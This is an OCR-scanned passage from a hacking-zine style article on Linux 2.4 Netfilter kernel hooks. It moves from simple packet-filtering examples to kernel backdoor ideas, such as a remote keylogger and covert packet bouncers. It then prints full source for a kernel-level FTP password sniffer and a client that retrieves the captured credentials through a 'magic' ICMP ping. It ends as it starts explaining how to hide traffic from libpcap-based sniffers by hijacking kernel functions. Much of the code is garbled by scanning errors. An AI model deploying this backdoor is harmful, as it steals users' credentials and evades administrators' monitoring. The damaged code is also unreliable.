pointers to IP header structures. This means that attempting to get a 
value from h->th thinking it’s pointing to the TCP header will result in 
false results because h->th will actually be pointing to the IP header, 
just like nh->iph. 


Other fields of immediat interest are th len and data fields. len 
specifies the total length of the packet data beginning at data. So now 
we know how to access individual protocol headers and the packet data 
itself from a sk_buff structure. What other interesting bits of 
information are available to Netfilter hook functions? 


The two arguments that come after skb are pointers to net_device 
structures. net_device structures are what the Linux kernel uses to 
describe network interfaces of all sorts. The first of these structures, 
in, is used to describe th interface th packet arrived on. Not 
surprisingly, the out  structur describes the interface the packet is 
leaving on. It is important to realise that usually only one of these 
structures will be provided. For instance, in will only be provided for 
the NF_IP_PRE_ROUTING and NF_IP_LOCAL_IN hooks. out will only be provided 
for the NF_IP_LOCAL_OUT and NF_IP_POST_ROUTING hooks. At this stage I 
haven’t tested which of these structures are available for the 
NF_IP_FORWARD hook but if you make sure the pointers are non-NULL before 
attempting to dereferenc them you should be fine. 


Finally, the last item passed into a hook function is a function pointer 
called okfn that takes a sk_buff structure as its only argument and 
returns an integer. I’m not too sure on what this function does. Looking 
in net/core/netfilter.c there are two places where this okfn is called. 
These two places are in the functions nf_hook_slow() and nf_reinject () 
where at a certain place this function is called on a return value of 
NF_ACCEPT from a Netfilter hook. If anybody has more information on okfn 
please let me know. 


Now that we’ve looked at the most interesting and useful bits of informa- 
tion that our hook functions receive, it’s time to look at how we can use 
that information to filter packets in a variety of ways. 


----[ 4.2 - Filtering by interface 


This would have to be the simplest filtering technique we can do. 
Remember those net_device structures our hook function received? Using 
the name field from the relevant net_device structure allows us to drop 
packets depending on their source interface or destination interface. To 
drop all packets that arrive on interface ethO all one has to do is 
compare the value of in->name with "ethO". If the names match then the 
hook function simply returns NF_DROP and the packet is destroyed. It’s as 
easy as that. Sample code to do this is provided in listing 2 below. Note 
that the Light-Weight FireWall module will provide simple examples of 
all the filtering methods presented here. It also includes an IOCTL 
interface and application to change its behaviour dynamically. 


Listing 2. Filtering packets based on their source interface 


/* Sample code to install a Netfilter hook function that will 
* drop all incoming packets on an interface we specify */ 
define _ KERNEL __ 
define MODU 
include <linux/module.h> 
i 
i 
i 
i 


aml 
iy 


include <linux/kernel.h> 

include <linux/netdevice.h> 

include <linux/netfilter.h> 

include <linux/netfilter_ipv4.h> 

/* This is the structure we shall use to register our function */ 
static struct nf_hook_ops nfho; 
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/* Name of the interface we want to drop packets from */ 
static char *drop_if = "lo"; 


/* This is the hook function itself */ 

unsigned int hook_func(unsigned int hooknum, 
struct sk_buff **skb, 
const struct net_device *in, 
const struct net_device *out, 
int (*okfn) (struct sk_buff *)) 


if (strcemp(in->name, drop_if) == 0) { 
printk ("Dropped packet on %s...\n", drop_if); 
return NF_DROP; 

} else { 
return NF_ACCEPT; 


} 
} 


/* Initialisation routine */ 
int init _module() 


{ 


/* Fill in our hook structure */ 

nfho.hook = hook_func; /* Handler function */ 
nfho.hooknum NF_IP_PRE ROUTING; /* First hook for IPv4 */ 
nfho.pf = PF_INET; 

nfho.priority NF_IP_PRI_FIRST; /* Make our function first */ 


GJ 


nf_register_hook (&nfho) ; 


return 0; 


} 


/* Cleanup routine */ 
void cleanup_module() 


{ 
nf_unregister_hook (&nfho) ; 
} 
Now isn’t that simple? Next, let’s have a look at filtering based on IP 
addresses. 


----[ 4.3 - Filtering by address 


As with filtering packets by their interface, filtering packets by their 


source or destination IP address is very simple. This time we are 
interested in the sk_buff structure. Now remember that the skb argument 
is a pointer to a pointer to a sk_buff structure. To avoid running into 


problems it is good practice to declare a seperate pointer to a sk_buff 
structure and assign the value pointed to by skb to this newly declared 
pointer. Like so: 


struct sk_buff *sb = *skb; /* Remove 1 level of indirection* / 


Now you only have to dereference onc to access items in the structure. 
Obtaining the IP header for a packet is done using the network layer header 
from the the sk_buff structure. This header is contained in a union and can 
be accessed as sk_buff->nh.iph. The function in listing 3 demonstrates how 
to check the source IP address of a received packet against an address to 
deny when given a sk_buff for the packet. This code has been pulled 
directly from LWFW. The only difference is that the update of LWFW 
statistics has been removed. 


Listing 3. Checking source IP of a received packet 


unsigned char *deny_ip = "\x7f£\x00\x00\x01"; /* 127.0.0.1 */ 
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static int check_ip_packet (struct sk_buff *skb) 
{ 
/* We don’t want any NULL pointers in the chain to 
* the IP header. */ 
if (!skb ) return NF_ACCEPT; 
if (!(skb->nh.iph)) return NF_ACCEPT; 


if (skb->nh.iph->saddr == *(unsigned int *)deny_ip) { 
return NF_DROP; 
} 


return NF_ACCEPT; 


} 


Now if the source address matches the address we want to drop packets from 
then the packet is dropped. For this function to work as presented the 
value of deny_ip should be stored in Network Byte Order (Big-endian, 
opposite of Intel). Although it’s unlikely that this function will be 
called with a NULL pointer for it’s argument, it never hurts to be a 
little paranoid. Of course if an error does occur then the function will 
return NF_ACCEPT so that Netfilter can continue processing the packet. 
Listing 4 presents the simple module used to demonstrate interface based 
filtering changed so that it drops packets that match a particular IP 
address. 


Listing 4. Filtering packets based on their source address 
/* Sample code to install a Netfilter hook function that will 
* drop all incoming packets from an IP address we specify */ 


define _ KERNEL __ 

define MODULE 

include <linux/module.h> 

include <linux/kernel.h> 

include <linux/skbuff.h> 
#include <linux/ip.h> /* For IP header */ 
include <linux/netfilter.h> 

include <linux/netfilter_ipv4.h> 


/* This is the structure we shall use to register our function */ 
static struct nf_hook_ops nfho; 


/* IP address we want to drop packets from, in NB order */ 
static unsigned char *drop_ip = "\x7£\x00\x00\x01L"; 


/* This is the hook function itself */ 

unsigned int hook_func(unsigned int hooknum, 
struct sk_buff **skb, 
const struct net_device *in, 
const struct net_device *out, 
int (*okfn) (struct sk_buff *)) 


struct sk_buff *sb = *skb; 


if (sb->nh.iph->saddr == drop_ip) { 
printk ("Dropped packet from... %d.%d.%d.%d\n", 
*drop_ip, *(drop_ip + 1), 
*(drop_ip + 2), *(drop_ip + 3)); 
return NF_DROP; 
} else { 
return NF_ACCEPT; 


} 
} 


/* Initialisation routine */ 
int init _module () 


{ 
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/* Fill in our hook structure */ 


nfho.hook = hook_func; 

/* Handler function */ 

nfho.hooknum = NF_IP_PRE ROUTING; /* First for IPv4 */ 
nfho.pf = PF_INET; 


nfho.priority = NF_IP_PRI_FIRST; /* Make our func first */ 
nf_register_hook (&nfho) ; 


return 0; 


} 


/* Cleanup routine */ 
void cleanup_module() 
{ 
nf_unregister_hook (&nfho) ; 


} 


----[ 4.4 - Filtering by TCP port 


Another simple rule to implement is the filtering of packets based on 
their TCP destination port. This is only a bit more fiddly than checking 
IP addresses becaus we need to create a pointer to the TCP header 
ourselves. Remember what was discussed earlier about transport headers 
and network headers? Getting a pointer to the TCP header is a simple 
matter of allocating a pointer to a struct tcphdr (define in linux/tcp.h) 
and pointing after the IP header in our packet data. Perhaps an example 
would help. Listing 5 presents code to check if the destination TCP port 
of a packet matches some port we want to drop all packets for. As with 
listing 3, this was taken from LWFW. 


Listing 5. Checking the TCP destination port of a received packet 
unsigned char *deny_port = "\x00\x19"; /* port 25 */ 


static int check_tcp_packet (struct sk_buff *skb) 


f 
struct tcphdr *thead; 


/* We don’t want any NULL pointers in the chain 
* to the IP header. */ 

if (!skb ) return NF_ACCEPT; 

if (!(skb->nh.iph)) return NF_ACCEPT; 


/* Be sure this is a TCP packet first */ 
if (skb->nh.iph->protocol != IPPROTO_TCP) { 
return NF_ACCEPT; 


} 


thead = (struct tcphdr *) (skb->data + 
(skb->nh.iph->ihl * 4)); 


/* Now check the destination port */ 
if ((thead->dest) == *(unsigned short *)deny_port) { 
return NF_DROP; 


} 


return NF_ACCEPT; 
} 


Very simple indeed. Don’t forget that for this function to work deny_port 
should be in network byte order. That’s it for packet filtering basics, 
you should have a fair understanding of how to get to the information you 
want for a specific packet. Now it’s time to move onto more interesting 
stuff. 
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--[ 5 - Other possibilities for Netfilter hooks 


Here I’ll make some proposals for other cool stuff to do with Netfilter 
hooks. Section 5.1 will simply provide food for thought, while section 5.2 
shall discuss and provide working code for a kernel based FTP password 
sniffer with remote password retrieval that really does work. It fact it 
works so well it scares me, and I wrote it. 


-—---[ 5.1 - Hidden backdoor daemons 


Kernel module programming would have to be one of the most interesting 
areas of development for Linux. Writing code in the kernel means you are 
writing code in a place where you are limited only by your imagination. 
From a malicous point of view you can hide files, processes, and do all 
sorts of cool things that any rootkit worth its salt is capable of. Then 
from a not-so-malicious point of view (yes peopl] with this point of view 
do exist) you can hide files, processes and do all sorts of cool things. 
The kernel really is a fascinating place. 


Now with all the power made available to a kernel level programmer, there 
are alot of possibilities. Possibly one of the most interesting (and 
scary for system administrators) is the possibility of backdoors built 
right into the kernel. Afterall, if a backdoor doesn’t run as a process 
then how do you know it’s running? Of course there are ways of making your 
kernel cough-up such backdoors, but they are by no means as easy and 
simple as running ps. Now the idea of putting backdoor code into a kernel 
is not new. What I’m proposing here, however, is placing simple network 
services as kernel backdoors using, you guessed it, Netfilter hooks. 


If you have the necessary skills and willingness to crash your kernel in 
the name of experimentation, then you can construct simple but useful 
network services located entirely in the kernel and accessible remotely. 
Basically a Netfilter hook could watch incoming packets for a "magic" 
packet and when that magic packet is received, do something special. 
Results can then be sent from the Netfilter hook and the hook function can 
return NF_STOLEN so that the received "magic" packet goes no further. Note 
however, that when sending in such a fassion, outgoing packets will still 
be visible on the outbound Netfilter hooks. Therefore userspace is totally 
unaware that the magic packet ever arrived, but they can still see 
whatever you send out. Beware! Just because a sniffer on a compromised host 
can’t s the packet, doesn’t mean that a sniffer on an intermediate host 
can’t see the packet. 


kossak and lifeline wrote an excellent article for Phrack describing how 
such things could be done by registering packet type handlers. Although 
this document deals with Netfilter hooks I still suggest reading their 
article (Issue 55, file 12) as it is a very interesting read with some 
very interesting ideas being presented. 


So what kind of work could a backdoor Netfilter hook do? Well, here ar 

some suggestions: 
Remote access key-logger. Module logs keystrokes and results are 
sent to a remote host when that host sends a PING request. Soa 
stream of keystroke information could be made to look like a steady 
(don’t flood) stream of PING replies. Of course one would want to 
implement a simple encryption so that ASCII keys don’t show 
themselves immediately and some alert system administrator goes 
"Hang on. I typed that over my SSH session before! Oh $%@T%S&!". 

—- Various simple administration tasks such as getting lists of who is 
currently logged onto the machine or obtaining information about 
open network connections. 

—-- Not really a backdoor as such, but a module that sits on a network 
perimeter and blocks any traffic suspected to come from trojans, 
ICMP covert channels or file sharing tools like KaZaa. 

—-- File transfer "server". I have implemented this idea recently. The 
resulting LKM is hours of fun :). 

-- Packet bouncer. Redirects packets aimed at a special port on the 
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backdoored host to another IP host and port and sends packets from 
that host back to the initiator. No process being spawned and best of 
all, no network socket being opened. 

-- Packet bouncer as described above used to communicate with critical 
systems on a network in a semi-covert manner. Eg. configuring routers 
and such. 

-- FTP/POP3/Telnet password sniffer. Sniff outgoing passwords and save 
the information until a magic packet comes in asking for it. 


Well that’s a short list of ideas. The last one will actually be discussed 
in more detail in the next section as it provides a nice oppurtunity to look 
at some more functions internal to the kernel’s network code. 


SSS fox.2 Kernel based FIP password sniffer 


Presented here is a simple proof-of-concept module that acts as a Netfilter 
backdoor. This module will sniff outgoing FTP packets looking for a USER 
and PASS command pair for an FTP server. When a pair is found the module 
will then wait for a "magic" ICMP ECHO (Ping) packet big enough to return 
the server’s IP address and the username and password. Also provided is a 
quick hack that sends a magic packet, gets a reply then prints the returned 
information. Once a username/password pair has been read from the module it 
W 
t 
t 


ill then look for the next pair. Note that only one pair will be stored by 
he module at one time. Now that a brief overview has been provided, it’s 
ime to present a more detailed look at how the module does its thing. 


hen loaded, the module’s init_module() function simply registers two 
etfilter hooks. The first one is used to watch incoming traffic (on 
F_IP_PRE_ROUTING) in an attempt to find a "magic" ICMP packet. The next 
ne is used to watch traffic leaving the machine (on NF_IP_POST_ROUTING) 
he module is installed on. This is where the search and capture of FTP 
SER and PASS packets happens. The cleanup_module() procedure simply 
nregisters these two hooks. 


Ce Oe Sy 


watch_out() is the function used to hook NF_IP_POST_ROUTING. Looking at 
this function you can see that it is very simple in operation. When a 
packet enters the function it is run through various checks to be sure it’s 
an FTP packet. If it’s not then a value of NF_ACCEPT is returned 
immediately. If it is an FTP packet then the module checks to be sure that 
it doesn’t already have a username and password pair already queued. If it 
does (as signalled by have_pair being non-zero) then NF_ACCEPT is returned 
and the packet can finally leave the system. Otherwise, th check_ftp() 
procedure is called. This is where extraction of passwords actually takes 
place. If no previous packets have been received then th target_ip and 
target_port variables should be cleared. 


check_ftp() starts by looking for either "USER", "PASS" or "QUIT" at the 
beginning of the packet. Note that PASS commands will not be processed 
until a USER command has been processed. This prevents deadlock that occurs 
if for some reason a PASS command is received first and the connection 
breaks before USER arrives. Also, if a QUIT command arrives and only a 
username has been captured then things are reset so sniffing can start over 
on a new connection. When a USER or PASS command arrives, if the necessary 
sanity checks are passed then the argument to the command is copied. Just 
before check_ftp() finishes under normal operations, it checks to see if it 
now has a valid username and password string. If it does then have_pair is 
set and no more usernames or passwords will be grabbed until the current 
pair is retrieved. 


So far you have seen how this module installs itself and begins looking for 
usernames and passwords to log. Now you’ shall see what happens when the 
specially formatted "magic" packet arrives. Pay particular attention here 
because this is where the most problems arose during development. 16 kernel 
faults if I remember correctly :). When packets come into the machine with 
this module installed, watch_in() checks each one to see if it is a magic 
packet. If it does not pass the necessary requirements to be considered 
magic, then the packet is ignored by watch_in() who simply returns 
NF_ACCEPT. Notice how one of the criteria for magic packets is that they 
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have enough room to hold the IP address and 
This is done to make sending the reply 

been allocated, but getting all of the 
difficult and you have to get them right! 
structure for our reply packet, we simply 


asier. 
necessary 


11 


username and password strings. 
A fresh sk_buff could have 
fields right can be 
So instead of creating a new 
tweak the request packet’s 


structure. To return the packet successfully, several changes need to be 
made. Firstly, the IP addresses are swapped around and the packet typ 

field of the sk_buff structure (pkt_type) is changed to PACKET_OUTGOING 
which is defined in linux/if_packet.h. The next thing to take care of is 
making sure any link layer headers are included. The data field of our 
received packet’s sk_buff points after the link layer header and it is the 
data field that points to the beginning of packet data to be transmitted. 
So for interfaces that require the link layer header (Ethernet and Loopback 
Point-to-Point is raw) we point the data field to the mac.ethernet or 


mac.raw structures. To determine what type of interface this packet came in 
on, you can check the value of sb->dev->typ wher sb is a pointer toa 
sk_buff structure. Valid values for this field can be found in 


linux/if_arp.h but the most useful are given below in table 3. 


Table 3: Common values for interface types 
Type Code Interface Type 
ARPHRD_ETHER Ethernet 

ARPHRD_LOOPBACK Loopback device 

ARPHRD_PPP Point-to-point (eg. dialup) 


The last thing to be 
reply. It’s now tim 
takes a pointer to a 
negative errno code 


done is actually copy the data we want to send in our 
to send the packet. The dev_queue_xmit() function 
sk_buff structure as it’s only argument and returns a 
on a nice failure. What do I mean by nice failure? 


Well, if you give dev_queue_xmit() a badly constructed socket buffer then 
you will get a not-so-nice failure. One that comes complete with kernel 
fault and kernel stack dump information. See how failures can be splt into 
two groups here? Finally, watch_in() returns NF_STOLEN to tell Netfilter 
to forget it ever saw the packet (bit of a Jedi Mind Trick). Do NOT return 
NF_DROP if you have called dev_queue_xmit()! If you do then you will 
quickly get a nasty kernel fault. This is becaus dev_queue_xmit() will 
free the passed in socket buffer and Netfilter will attempt to do the same 
with an NF_DROPped packet. Well that’s enough discussion on the code, it’s 
now time to actually see the code. 
<= [ 5.2.1 - The code... nfsniff.c 
<++> nfsniff/nfsniff.c 

/* Simple proof-of-concept for kernel-based FTP password sniffer. 

* A captured Username and Password pair are sent to a remote host 

* when that host sends a specially formatted ICMP packet. Here we 

* shall use an ICMP_ECHO packet whose code field is set to 0x5B 

* *AND* the packet has enough 

* space after the headers to fit a 4-byte IP address and the 

* username and password fields which are a max. of 15 characters 

* each plus a NULL byte. So a total ICMP payload size of 36 bytes. */ 


/* Written by bioforge, March 2003 */ 


define MODULE 

define __KERNEL__ 

include <linux/module.h> 
#include <linux/kernel.h> 
include <linux/skbuff.h> 
include <linux/in.h> 
include <linux/ip.h> 
include <linux/tcp.h> 
include <linux/icmp.h> 
include <linux/netdevice.h> 
include <linux/netfilter.h> 
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include <linux/netfilter_ipv4.h> 
include <linux/if_arp.h> 

include <linux/if_ether.h> 
include <linux/if_packet.h> 


define MAGIC_CODE 0x5B 
define REPLY SIZE 36 


x 


define ICMP_PAYLOAD_ SIZE (htons(sb->nh.iph->tot_len) \ 
- sizeof(struct iphdr) \ 
— sizeof(struct icmphdr) ) 


/* THESE values are used to keep the USERname and PASSword until 
* they are queried. Only one USER/PASS pair will be held at one 
* time and will be cleared once queried. */ 
static char *username = NULL; 
static char *password = NULL; 
static int have_pair = 0; /* Marks if we already have a pair */ 


/* Tracking information. Only log USER and PASS commands that go to the 
* same IP address and TCP port. */ 

static unsigned int target_ip = 0; 

static unsigned short target_port = 0; 


/* Used to describe our Netfilter hooks */ 
struct nf_hook_ops pre_hook; /* Incoming */ 
struct nf_hook_ops post_hook; /* Outgoing */ 


/* Function that looks at an sk_buff that is known to be an FTP packet. 
* Looks for the USER and PASS fields and makes sure they both come from 
* the one host as indicated in the target_xxx fields */ 

static void check_ftp(struct sk_buff *skb) 

{ 


struct tcphdr *tcp; 
char *data; 
int len = 0; 


int i = 0; 
tcp = (struct tcphdr *) (skb->data + (skb->nh.iph->ihl * 4)); 
data = (char *) ((int)tcp + (int) (tcp->doff * 4)); 


/* Now, if we have a username already, then we have a target_ip. 
* Make sure that this packet is destined for the same host. */ 
if (username) 
if (skb->nh.iph->daddr != target_ip || tcp->source != target_port) 
return; 


/* Now try to see if this is a USER or PASS packet */ 


if (strncmp(data, "USER ", 5) == 0) { /* Username */ 
data += 5; 
if (username) return; 
while (*(data + i) != ’\r’ && *(data + i) != ’\n’ 
&& *(data + i) != /'’\0’ && i < 15) { 

len+t; 

itt; 
} 
if ((username = kmalloc(len + 2, GFP_KERNEL)) == NULL) 

return; 


memset (username, 0x00, len + 2); 
memcpy (username, data, len); 
*(username + len) = ’\0’; /* NULL terminate */ 
} else if (strncmp(data, "PASS ", 5) == 0) { /* Password */ 
data += 5; 
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/* If a username hasn’t been logged yet then don’t try logging 
* a password */ 


if (username == NULL) return; 
if (password) return; 
while (*(data + i) != ’\r’ && *(data + i) != ’\n’ 
&& *(data + i) != /’\0’ && i < 15) { 

len+t+; 

itt; 
} 
if ((password = kmalloc(len + 2, GFP_KERNEL)) == NULL) 

return; 


memset (password, 0x00, len + 2); 
memcpy (password, data, len); 
* (password + len) = ’\0’; /* NULL terminate */ 
} else if (strncmp(data, "QUIT", 4) == 0) { 
/* Quit command received. If we have a username but no password, 
* clear the username and reset everything */ 
if (have_pair) return; 
if (username && !password) { 
kfree (username) ; 
username = NULL; 
target_port = target_ip = 0; 
have_pair = 0; 


return; 
} 
} else { 
return; 


} 


if (!target_ip) 

target_ip = skb->nh.iph->daddr; 
if (!target_port) 

target_port = tcp->source; 


if (username && password) 
have_pairtt; /* Have a pair. Ignore others until 
* this pair has been read. */ 
// if (have_pair) 
// printk("Have password pair! U: $s P: s\n", username, password) ; 


} 


/* Function called as the POST_ROUTING (last) hook. It will check for 
* FTP traffic then search that traffic for USER and PASS commands. */ 
static unsigned int watch_out (unsigned int hooknum, 
struct sk_buff **skb, 
const struct net_device *in, 
const struct net_device *out, 
int (*okfn) (struct sk_buff *)) 


struct sk_buff *sb = *skb; 
struct tcphdr *tcp; 


/* Make sure this is a TCP packet first */ 


if (sb->nh.iph->protocol != IPPROTO_TCP) 
return NF_ACCEPT; /* Nope, not TCP */ 
tcp = (struct tcphdr *) ((sb->data) + (sb->nh.iph->ihl * 4)); 


/* Now check to see if it’s an FTP packet */ 
if (tcp->dest != htons(21)) 
return NF_ACCEPT; /* Nope, not FTP */ 


/* Parse the FTP packet for relevant information if we don’t already 
* have a username and password pair. */ 
if ('!have_pair) 
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check_ftp(sb); 


/* We are finished with the packet, let it go on its way */ 
return NF_ACCEPT; 


Procedure that watches incoming ICMP traffic for the "Magic" packet. 
When that is received, we tweak the skb structure to send a reply 
back to the requesting host and tell Netfilter that we stole the 
packet. */ 


static unsigned int watch_in(unsigned int hooknum, 


struct sk_buff **skb, 

const struct net_device *in, 
const struct net_device *out, 
int (*okfn) (struct sk_buff *)) 


struct sk_buff *sb = *skb; 

struct icmphdr *icmp; 

char *cp_data; /* Where we copy data to in reply */ 
unsigned int taddr; /* Temporary IP holder */ 


/* Do w ven have a username/password pair to report yet? */ 
if ('!have_pair) 
return NF_ACCEPT; 


/* Is this an ICMP packet? */ 
if (sb->nh.iph->protocol != IPPROTO_ICMP) 
return NF_ACCEPT; 


icmp = (struct icmphdr *) (sb->data + sb->nh.iph->ihl * 4); 


/* Is it the MAGIC packet? */ 

if (icmp->code != MAGIC_CODE || icmp->type != ICMP_ECHO 
| | ICMP_PAYLOAD SIZE < REPLY SIZE) { 
return NF_ACCEPT; 


[t] 


/* Okay, matches our checks for "Magicness", now we fiddle with 
* the sk_buff to insert the IP address, and username/password pair, 
* swap IP source and destination addresses and ethernet addresses 
* if necessary and then transmit the packet from here and tell 
* Netfilter we stole it. Phew... */ 
taddr = sb->nh.iph->saddr; 
sb->nh.iph->saddr = sb->nh.iph->daddr; 
sb->nh.iph->daddr = taddr; 


sb->pkt_type = PACKET_OUTGOING; 


switch (sb->dev->type) { 
case ARPHRD_PPP: /* No fiddling needs doing */ 
break; 
case ARPHRD_LOOPBACK: 
case ARPHRD_ETHER: 
{ 


unsigned char t_hwaddr[ETH_ALEN]; 


/* Move the data pointer to point to the link layer header */ 
sb->data = (unsigned char *)sb->mac.ethernet; 
sb->len += ETH_HLEN; //sizeof(sb->mac.ethernet); 
memcpy (t_hwaddr, (sb->mac.ethernet-—>h_dest), ETH_ALEN) ; 

memcpy ((sb->mac.ethernet->h_dest), (sb->mac.ethernet-—>h_source), 
ETH ALEN) ; 
memcpy ( (sb->mac.ethernet->h_source), t_hwaddr, ETH_ALEN) ; 


break; 


}; 
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/* Now copy the IP address, then Username, then password into packet */ 
cp_data = (char *) ((char *)icmp + sizeof (struct icmphdr) ); 
memcpy (cp_data, &target_ip, 4); 
if (username) 
memcpy (cp_data + 4, username, 16); 
if (password) 
memcpy (cp_data + 20, password, 16); 


/* This is where things will die if they are going to. 
* Fingers crossed... */ 
dev_queue_xmit (sb); 


/* Now fr the saved username and password and reset have_pair */ 
kfree (username) ; 

kfree (password) ; 

username = password = NULL; 

have_pair = 0; 


target_port = target_ip = 0; 


// printk ("Password retrieved\n") ; 


return NF_STOLEN; 


} 


int init _module () 

{ 
pre_hook.hook = watch_in; 
pre_hook.pf PF_INET; 


pre_hook.priority = NF_IP_PRI_FIRST; 
pre_hook.hooknum = NF_IP_PRE_ROUTING; 
post_hook.hook = watch_out; 
post_hook.pf = PF_INET; 
post_hook.priority = NF_IP_PRI_FIRST; 
post_hook.hooknum = NF_IP_POST_ROUTING; 


nf_register_hook (&pre_hook) ; 
nf_register_hook (&post_hook) ; 


return 0; 


} 


void cleanup_module() 

{ 
nf_unregister_hook (&post_hook) ; 
nf_unregister_hook (&pre_hook) ; 


if (password) 
kfree (password) ; 

if (username) 
kfree (username) ; 


ae ee [ 5.2.2 - getpass.c 


<++> nfsniff/getpass.c 

/* getpass.c —- simple utility to get username/password pair from 
the Netfilter backdoor FTP sniffer. Very kludgy, but effective. 
Mostly stripped from my source for InfoPig. 


+ + F 


Written by bioforge - March 2003 */ 


include <sys/types.h> 
include <stdio.h> 
include <stdlib.h> 
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include <unistd.h> 
include <string.h> 
include <errno.h> 
include <sys/socket.h> 
include <netdb.h> 
include <arpa/inet.h> 


ifndef __USE_BSD 

define __USE_BSD /* We want the proper headers */ 
endif 
include <netinet/ip.h> 
include <netinet/ip_icmp.h> 


/* Function prototypes */ 
static unsigned short checksum(int numwords, unsigned short *buff); 


int main(int argc, char *argv[]) 


{ 


unsigned char dgram[256]; /* Plenty for a PING datagram */ 
unsigned char recvbuff[256]; 

struct ip *iphead = (struct ip *)dgram; 

struct icmp *icmphead = (struct icmp *) (dgram + sizeof(struct ip)); 


struct sockaddr_in src; 
struct sockaddr_in addr; 
struct in_addr my_addr; 
struct in_addr serv_addr; 


socklen_t src_addr_size = sizeof (struct sockaddr_in); 
int icmp_sock = 0; 

int one = 1; 

int *ptr_one = &one; 


if (argc < 3) { 
fprintf(stderr, "Usage: %s remoteIP myIP\n", argv[0]); 
exit (1); 

} 


/* Get a socket */ 
if ((icmp_sock = socket (PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) { 
fprintf(stderr, "Couldn’t open raw socket! %s\n", 
strerror(errno)); 
exit(1); 


} 


/* set the HDR_INCL option on the socket */ 
if (setsockopt (icmp_sock, IPPROTO_IP, IP_HDRINCL, 
ptr_one, sizeof(one)) < 0) { 
close (icmp_sock) ; 
fprintf(stderr, "Couldn’t set HDRINCL option! %s\n", 
strerror(errno)); 
exit(1); 


} 


addr.sin_family = AF_INET; 
addr.sin_addr.s_addr = inet_addr(argv[1]); 


my_addr.s_addr = inet_addr(argv[2])j; 


memset (dgram, 0x00, 256); 
memset (recvbuff, 0x00, 256); 


/* Fill in the IP fields first */ 
iphead->ip_hl = 5; 

iphead->ip_v = 4; 
iphead->ip_tos = 0; 
iphead->ip_len 84; 

iphead->ip_id = (unsigned short) rand(); 
iphead->ip_off 0; 

iphead->ip_ttl = 128; 
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iphead->ip_p IPPROTO_ICMP; 
iphead->ip_sum = 0; 
iphead->ip_sre = my_addr; 
iphead->ip_dst addr.sin_addr; 


/* Now fill in the ICMP fields */ 
icmphead->icmp_type = ICMP_ECHO; 
icmphead->icmp_code = 0x5B; 


icmphead->icmp_cksum = checksum(42, (unsigned short *) icmphead) ; 


/* Finally, send the packet */ 
fprintf(stdout, "Sending request...\n"); 


if (sendto(icmp_sock, dgram, 84, 0, (struct sockaddr *)é&addr, 


sizeof (struct sockaddr)) < 0) { 
fprintf(stderr, "\nFailed sending request! 
strerror(errno)); 
return 0; 


} 


fprintf(stdout, "Waiting for reply...\n"); 
if (recvfrom(icmp_sock, recvbuff, 256, 0, (stru 
&src_addr_size) < 0) { 


s\n", 


ct sockaddr *)&src, 


fprintf(stdout, "Failed getting reply packet! %s\n", 


strerror(errno)); 
close (icmp_sock) ; 


exit (1); 
} 
iphead = (struct ip *)recvbuff; 
icmphead = (struct icmp *) (recvbuff + sizeof(st 
memcpy (&serv_addr, ((char *)icmphead + 8), 


sizeof (struct in_addr)); 


fprintf(stdout, "Stolen for ftp server %s:\n", 


fprintf(stdout, "Username: s\n", 

(char *) ((char *)icmphead + 12)); 
fprintf(stdout, "Password: s\n", 

(char *) ((char *)icmphead + 28)); 


close (icmp_sock) ; 


return 0; 


} 


ruct ip)); 


inet_ntoa(serv_addr)); 


/* Checksum-generation function. It appears that PING’ed machines don’t 


* reply to PINGs with invalid (ie. empty) ICMP Che 
* Fair enough I guess. */ 


cksum fields... 


static unsigned short checksum(int numwords, unsigned short *buff) 


{ 


unsigned long sum; 


for(sum = O;numwords > 0;numwords-~—) 

sum += *buff+tt; /* add next word, then increment pointer */ 
sum = (sum >> 16) + (sum & OXFFFF); 
sum += (sum >> 16); 


return ~sum; 


} 


bie 


--[ 6 - Hiding network traffic from Libpcap 


This section will briefly describe how the Linux 2.4 kernel 


can be hacked to make network traffic that matches 
conditions invisible to packet sniffing software 
the local machine. Presented at the end of this 


predefined 
running on 
article is 
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working code that will do such a thing for all IPv4 traffic 
coming from or going to a particular IP address. So let’s 


get started shall we... 


—---[ 6.1 - SOCK_PACKET, SOCK_RAW and Libpcap 


Some of the most useful software for a system administrator 


is that which can be classified under the broad title 


of 


"packet sniffer". Two of the most common examples of general 


purpose packet sniffers are tcpdump(1) and Ethereal(1l). 


Both 


of these applications utilise the Libpcap library (available 
from [1] along with tcpdump) to capture raw packets. Network 
Intrusion Detection Systems (NIDS) also make use of the 
Libpcap library. SNORT requires Libpcap, as does Libnids, a 
NIDS writing library that provides IP reassembly and TCP 


stream following and is available from [2]. 


On Linux systems, the Libpcap library uses the SOCK_PACKET 
interface. Packet sockets are special sockets that can be 
used to send and receive raw packets at the link layer. There 


is a lot that can be said about packet sockets and their 


use. 


However, because this section is about hiding from them and 


not using them, the interested reader is directed to 
packet(7) man page. For the discussion here, it is 


the 
only 


neccessary to understand that packet sockets are what Libpcap 
applications use to get the information on raw packets coming 


into or going out of the machine. 


When a packet is received by the kernel’s network stack, a 
check is performed to see if there are any packet sockets 


that would be interested in this packet. If there are 
the packet is delivered to those interested sockets. If 


then 
not, 


the packet simply continues on it’s way to the TCP, UDP or 
other socket type that it’s truly bound for. The same thing 


happens for sockets of type SOCK_RAW. Raw sockets are 
Similar to packet sockets, xcept they do not’ provide 
layer headers. An example of a utility that utilises 


very 
link 
raw 


IP sockets is my SYNalert utility, available at [3] (sorry 


about the shameless plug there :). 


So now you should see that packet sniffing software 
Linux uses the Libpcap library. Libpcap utilises the packet 
socket interface to obtain raw packets with link layers on 
Linux systems. Raw sockets were also mentioned which act as 


on 


a way for user space applications to obtain packets complete 
with IP headers. The next section will discuss how an LKM 
can be used to hide network traffic from these packet and raw 


socket interfaces. 


pees cx ae [ 6.2 Wrapping the cloak around the dagger 


When a packet is received and sent to a packet socket, the 
packet_rcev() function is called. This function can be found 
in net/packet/af_packet.c. packet_rcv() is responsible for 


running the packet through any socket filters that may be 
applied to the destination socket and then the ultimate 


delivery of the packet to user space. To hide packets 


from 


a packet socket we need to prevent packet_rcv() from being 


called at all for certain packets. How do we do this? 
good ol’-fashioned function hijacking of course. 


With 


The basic operation of function hijacking is that if we 


know the address of a kernel function, even one that’s not 
exported, we can redirect that function to another location 
before we allow the real code to run. To do this we first 


save so many of the original instruction bytes from 


the 


beginning of the function and replace them with instruction 
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bsolute jump to our own code. Example 
is is given here: 


f our function), Seax 


The generated hex byt 
zero as our function ad 


Oxb8 0x00 0x00 O 
Oxff Oxed 


If in the initialisa 
address of zero in 
function, we can make o 
we want to run the ori 
original bytes at the 
